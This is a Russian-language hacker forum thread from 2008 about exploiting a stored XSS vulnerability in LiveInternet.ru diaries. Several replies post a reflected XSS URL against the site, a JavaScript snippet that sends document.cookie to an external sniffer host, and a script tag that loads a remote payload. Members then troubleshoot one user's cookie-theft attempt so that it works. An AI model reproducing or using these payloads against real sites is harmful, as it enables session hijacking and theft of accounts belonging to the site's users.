Активная XSS в дневнике LiveInternet.ru

Discussion in 'Уязвимости' started by Zinus, 12 Nov 2008.

  1. Zinus

    Zinus Banned

    Joined:
    8 Aug 2008
    Messages:
    17
    Likes Received:
    10
    Reputations:
    1
    /////////////

    ////////////
     
    #1 Zinus, 12 Nov 2008
    Last edited: 3 Jan 2009
  2. DVD_RW

    DVD_RW Banned

    Joined:
    27 Apr 2008
    Messages:
    0
    Likes Received:
    202
    Reputations:
    -36
    =\ хацкер!!! ;D
     
    #2 DVD_RW, 12 Nov 2008
  3. Zinus

    Zinus Banned

    Joined:
    8 Aug 2008
    Messages:
    17
    Likes Received:
    10
    Reputations:
    1
    Объяснил для тех кто не соображает.
     
    #3 Zinus, 12 Nov 2008
  4. Peklots

    Peklots Elder - Старейшина

    Joined:
    28 Sep 2008
    Messages:
    281
    Likes Received:
    144
    Reputations:
    36
    Ога,пантанулся,надо было у себя держать,щас ее быстро прикроют.
     
    #4 Peklots, 12 Nov 2008
  5. [:|||||:]

    [:|||||:] Banned

    Joined:
    29 May 2008
    Messages:
    68
    Likes Received:
    59
    Reputations:
    11
    http://forum.antichat.ru/showpost.php?p=883295&postcount=269
     
    #5 [:|||||:], 12 Nov 2008
  6. E1ephant

    E1ephant New Member

    Joined:
    18 Nov 2008
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    +1
     
    #6 E1ephant, 18 Nov 2008
  7. foopi

    foopi Member

    Joined:
    26 Oct 2008
    Messages:
    41
    Likes Received:
    20
    Reputations:
    5
    http://www.liveinternet.ru/tests.php?cmd=show&session_id=a2377cc8c3a9eec8d990121c03cbf124&order=%22%3E%3Cscript%3Ealert('%EF%E0%F1%F1%E8%E2%EA%E0')%3C/script%3E
     
    #7 foopi, 19 Nov 2008
  8. ickhz

    ickhz New Member

    Joined:
    1 Dec 2008
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Создаю аккаунт на бесплатном хостинге holm.ru , заливаю туда следующий скрипт, который должен отправлять куки зашедшего на сниффер:

    img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;

    в файле 1.js, итак пишу ссылку <script>http://hzz.h18.ru/1.js</script> в "Имя".
    Захожу в профиль, после этого сразу открываю http://old.antichat.ru/sniff/log.php . И ничего нового на сниффер не ушло.

    Я не очень хорошо разбираюсь в javascript, но вроде-бы это должно работать?? Подскажите, что здесь не так?
     
    #8 ickhz, 1 Dec 2008
  9. DimOnOID

    DimOnOID Banned

    Joined:
    5 Dec 2006
    Messages:
    407
    Likes Received:
    126
    Reputations:
    4
    указывай

    http://old.antichat.ru/cgi-bin/s.jpg
    а не
    http://antichat.ru/cgi-bin/s.jpg
     
    #9 DimOnOID, 1 Dec 2008
  10. Antiakvt

    Antiakvt Elder - Старейшина

    Joined:
    14 Sep 2007
    Messages:
    57
    Likes Received:
    8
    Reputations:
    1
    Code:
    <script src="http://hzz.h18.ru/1.js"> 
</script>
     
    #10 Antiakvt, 1 Dec 2008
  11. ickhz

    ickhz New Member

    Joined:
    1 Dec 2008
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    не работает.... походу баг закрыли ;(
     
    #11 ickhz, 9 Dec 2008
(You must log in or sign up to post here.)
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.